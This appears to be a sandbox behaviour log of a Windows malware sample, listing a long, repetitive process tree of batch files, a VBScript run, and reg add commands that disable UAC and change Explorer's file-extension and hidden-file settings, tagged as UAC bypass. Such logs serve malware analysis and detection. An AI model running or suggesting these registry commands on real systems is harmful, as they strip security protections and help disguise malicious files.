C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DQMUsksA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
134⤵
PID:624

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
135⤵
PID:3644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
134⤵
- UAC bypass
- Modifies registry key
PID:4368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
134⤵
- Modifies registry key
PID:1492

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
132⤵
- UAC bypass
- Modifies registry key
PID:3792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wGAkMMUI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
132⤵
PID:2316

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
133⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
132⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
132⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MQscQggs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
130⤵
PID:1888

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
131⤵
PID:724

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
130⤵
PID:3956

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
130⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
130⤵
PID:2188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DEEAYYMk.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
128⤵
PID:3100

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
129⤵
PID:3164

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
128⤵
- UAC bypass
PID:696

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
128⤵
PID:856

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
128⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\riAIMEQg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
126⤵
PID:2992

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
127⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
126⤵
- Modifies registry key
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
126⤵
PID:2968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
126⤵
- Modifies visibility of file extensions in Explorer
PID:4252

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
124⤵
PID:1336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zGIIQUAU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
124⤵
PID:3216

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
125⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
124⤵
PID:4820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
124⤵
PID:772

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
122⤵
- Modifies visibility of file extensions in Explorer
PID:3812

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
122⤵
- UAC bypass
PID:5016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkMwYQsA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
122⤵
PID:1324

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
123⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
122⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yMcwwMQY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
120⤵
PID:4944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
121⤵
PID:4412

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
120⤵
- UAC bypass
- Modifies registry key
PID:4268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
120⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
120⤵
PID:752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
118⤵
PID:4028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
118⤵
- UAC bypass
- Modifies registry key
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
118⤵
- Modifies registry key
PID:3416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xMoAMwcw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
118⤵
PID:3236

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
119⤵
PID:3624

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
116⤵
PID:3588

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
116⤵
- UAC bypass
PID:2872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PasMYAAI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
116⤵
PID:4692

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
117⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
116⤵
PID:4644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
114⤵
- UAC bypass
- Modifies registry key
PID:896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
114⤵
PID:3656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
114⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lsYIwwcw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
114⤵
PID:1716

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
115⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
112⤵
- Modifies visibility of file extensions in Explorer
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rkEoQMws.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
112⤵
PID:4648

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
113⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
112⤵
- UAC bypass
- Modifies registry key
PID:748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
112⤵
PID:4816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
110⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OuYQYAMg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
110⤵
PID:3688

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
111⤵
PID:4412

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
110⤵
- UAC bypass
PID:4232

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
110⤵
PID:2188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
108⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lmkkMgAg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
108⤵
PID:4900

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
109⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
108⤵
- UAC bypass
PID:1560

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
108⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
106⤵
PID:4376

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
106⤵
- Modifies registry key
PID:3972

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
106⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uogMwwsI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
106⤵
PID:680

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
107⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
104⤵
PID:1100

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
104⤵
PID:2856

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
104⤵
PID:2276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zaAUYwQw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
104⤵
PID:3488

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
105⤵
PID:2108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
102⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NsYIAMsU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
102⤵
PID:4660

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
103⤵
PID:1312

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
102⤵
- UAC bypass
- Modifies registry key
PID:2004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
102⤵
- Modifies registry key
PID:3328

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
100⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOowogAU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
100⤵
PID:2196

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
101⤵
PID:3472

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
100⤵
PID:532

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
100⤵
PID:4612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
98⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dqIYwoIE.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
98⤵
PID:2712

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
99⤵
PID:1364

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
98⤵
- UAC bypass
- Modifies registry key
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
98⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
96⤵
- Modifies visibility of file extensions in Explorer
PID:4580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgskAogw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
96⤵
PID:4276

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
97⤵
PID:3136

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
96⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
96⤵
PID:2380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
94⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
94⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
94⤵
PID:1388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VuQAUUgo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
94⤵
PID:5048

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
95⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
92⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUokooIs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
92⤵
PID:4360

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
93⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
92⤵
- UAC bypass
PID:4672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
92⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
90⤵
- Modifies visibility of file extensions in Explorer
PID:592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGUsUsEQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
90⤵
PID:60

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
91⤵
PID:3644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
90⤵
- UAC bypass
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
90⤵
PID:3180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
88⤵
- Modifies registry key
PID:1372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
88⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xEoUYwsM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
88⤵
PID:2196

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
89⤵
PID:992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
88⤵
- UAC bypass
PID:2188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
86⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
86⤵
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uwkMMMwA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
86⤵
PID:4728

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
87⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
86⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
84⤵
- Modifies visibility of file extensions in Explorer
PID:3468

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
84⤵
- Modifies registry key
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUwMogQY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
84⤵
PID:1424

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
85⤵
PID:3432

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
84⤵
- UAC bypass
- Modifies registry key
PID:3212

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
82⤵
- UAC bypass
- Modifies registry key
PID:2108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
82⤵
PID:3804

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
82⤵
- Modifies visibility of file extensions in Explorer
PID:336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HiUsEgAk.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
82⤵
PID:680

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
83⤵
PID:4644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
80⤵
- Modifies visibility of file extensions in Explorer
PID:4256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EyMkYMQI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
80⤵
PID:3948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
81⤵
PID:3388

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
80⤵
- UAC bypass
PID:4340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
80⤵
PID:1436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
78⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hAoIsUIQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
78⤵
PID:3180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
79⤵
PID:4980

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
78⤵
- UAC bypass
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
78⤵
PID:520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
76⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
